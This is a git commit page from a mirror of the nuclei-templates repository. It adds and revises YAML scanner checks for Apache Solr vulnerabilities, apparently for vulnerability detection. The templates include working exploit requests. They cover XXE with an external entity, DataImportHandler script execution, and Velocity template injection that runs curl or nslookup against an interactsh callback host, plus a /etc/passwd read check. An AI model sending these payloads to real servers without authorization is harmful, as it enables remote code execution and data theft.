daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #2357 from projectdiscovery/solr-fixes 

Added CVE-2019-0193 and few fixes
patch-1
Sandeep Singh 2021-08-09 22:02:56 +05:30 committed by GitHub
parent d7dfb007de 8c48ca97d2
commit 99f71a941c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
6 changed files with 99 additions and 42 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

24
cves/2017/CVE-2017-12629.yaml
View File

@ -1,26 +1,36 @@
id: CVE-2017-12629
info:
name: Apache Solr <= 7.1 Remote Code Execution via SSRF
name: Apache Solr <= 7.1 XML entity injection
author: dwisiswant0
severity: critical
tags: cve,cve2017,solr,apache,rce,ssrf,oob
tags: cve,cve2017,solr,apache,oob,xxe
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2017-12629
- https://twitter.com/honoki/status/1298636315613974532/photo/1
- https://twitter.com/honoki/status/1298636315613974532
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-RCE
requests:
- raw:
- |
GET /solr/select?qt=%2Fconfig%2523%26&shards=127.0.0.1:8984/solq&stream.body=%7B%22add-listener%22%3A%7B%22event%22%3A%22postCommit%22%2C%22name%22%3A%22nuclei%22%2C%22class%22%3A%22solr.RunExecutableListener%22%2C%22exe%22%3A%22sh%22%2C%22dir%22%3A%22%2Fbin%2F%22%2C%22args%22%3A%5B%22-c%22%2C%22%24%40%7Csh%22%2C%22.%22%2C%22echo%22%2C%22nslookup%22%2C%22%24%28whoami%29.{{interactsh-url}}%22%5D%7D%7D&wt=json&isShard=true&q=apple HTTP/1.1
GET /solr/admin/cores?wt=json HTTP/1.1
Host: {{Hostname}}
- |
GET /solr/select?shards=127.0.0.1:8984/solr/update%23&commit=true HTTP/1.1
GET /solr/{{core}}/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22https%3A%2F%2F{{interactsh-url}}%2F%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "dns"
- "http"
extractors:
- type: regex
internal: true
name: core
group: 1
regex:
- '"name"\:"(.*?)"'

47
cves/2019/CVE-2019-0193.yaml Normal file
View File

@ -0,0 +1,47 @@
id: CVE-2019-0193
info:
name: Apache Solr - DataImportHandler RCE
description: In Apache Solr, the DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the whole DIH configuration can come from a request's "dataConfig" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk. Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property "enable.dih.dataConfigParam" to true.
author: pdteam
severity: critical
refrense: |
- https://nvd.nist.gov/vuln/detail/CVE-2019-0193
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193
- https://paper.seebug.org/1009/
tags: cve,cve2019,apache,rce,solr,oob
requests:
- raw:
- |
GET /solr/admin/cores?wt=json HTTP/1.1
Host: {{Hostname}}
Accept-Language: en
Connection: close
- |
POST /solr/{{core}}/dataimport?indent=on&wt=json HTTP/1.1
Host: {{Hostname}}
Content-type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20http://{{interactsh-url}}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport
extractors:
- type: regex
internal: true
name: core
group: 1
regex:
- '"name"\:"(.*?)"'
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: status
status:
- 200

41
cves/2019/CVE-2019-17558.yaml
View File

@ -4,7 +4,7 @@ info:
author: pikpikcu,madrobot
severity: critical
refrense: https://nvd.nist.gov/vuln/detail/CVE-2019-17558
tags: cve,cve2019,apache,rce,solr
tags: cve,cve2019,apache,rce,solr,oob
requests:
- raw:
@ -15,15 +15,10 @@ requests:
Connection: close
- |
POST /solr/{{collection}}/config HTTP/1.1
POST /solr/{{core}}/config HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close
Content-Type: application/json
Content-Length: 259
Upgrade-Insecure-Requests: 1
{
"update-queryresponsewriter": {
@ -37,25 +32,25 @@ requests:
}
- |
GET /solr/{{collection}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27nslookup%20example.com%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
GET /solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27curl%20http://{{interactsh-url}}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close
Upgrade-Insecure-Requests: 1
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: status
status:
- 200
extractors:
- type: regex
regex:
- '"status"\:\{"(.*?)"\:\{"name"'
name: collection
group: 1
internal: true
matchers:
- type: word
words:
- "Non-authoritative answer"
- "example.com"
condition: and
name: core
group: 1
regex:
- '"name"\:"(.*?)"'

7
cves/2021/CVE-2021-27905.yaml
View File

@ -26,13 +26,14 @@ requests:
Accept-Language: en
Connection: close
extractors:
- type: regex
regex:
- '"status"\:\{"(.*?)"\:\{"name"'
internal: true
name: core
group: 1
internal: true
regex:
- '"name"\:"(.*?)"'
matchers:
- type: word

1
misconfiguration/solr-query-dashboard.yaml
View File

@ -18,6 +18,7 @@ requests:
- type: word
words:
- '<title>Solr admin page</title>'
- type: status
status:
- 200

21
vulnerabilities/apache/apache-solr-file-read.yaml
View File

@ -24,18 +24,21 @@ requests:
Accept-Language: en
Connection: close
extractors:
- type: regex
regex:
- '"status"\:\{"(.*?)"\:\{"name"'
internal: true
name: core
group: 1
internal: true
regex:
- '"name"\:"(.*?)"'
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'regex("root:.*:0:0:", body_2)'
condition: and
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"